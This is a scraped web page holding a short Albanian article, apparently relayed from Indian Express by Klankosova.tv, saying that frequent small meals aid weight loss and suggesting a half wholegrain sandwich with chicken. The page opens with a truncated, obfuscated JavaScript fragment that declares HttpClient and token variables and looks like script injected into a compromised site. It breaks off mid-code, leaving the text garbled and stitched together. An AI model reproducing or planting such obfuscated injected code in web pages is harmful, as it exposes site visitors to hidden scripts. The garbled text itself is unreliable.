;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Si të humbni peshë duke ngrënë disa herë në ditë?

By

Kur përpiqen të humbin peshë, shumë njerëz priren të anashkalojnë vaktet duke menduar se do t’i ndihmojnë ata në këtë qëllim të tyre.

Megjithatë, kjo nuk është ajo që ndihmon në humbjen e peshës. Sipas nutricionistëve, ngrënia e vakteve të shpeshta dhe të vogla gjatë gjithë ditës ndihmon në arritjen e qëllimit, shkruan Indianexpress, transmeton Klankosova.tv.

Sipas disa nutricionistëve, studimet kanë treguar se ngrënia e shpeshtë e mini-vakteve të përhapura gjatë gjithë ditës parandalon ngadalësimin e metabolizmit, largon urinë, ushqen në mënyrë optimale trupin tuaj dhe ka një ndikim pozitiv në nivelet e kolesterolit dhe insulinës.

Një zgjidhje e mirë për të ngrënë mund të jetë gjysmë sanduiçi i bërë me një fetë buke integrale e mbushur me pulë të grirë, kastravec dhe domate.

Artikuj të ngjashëm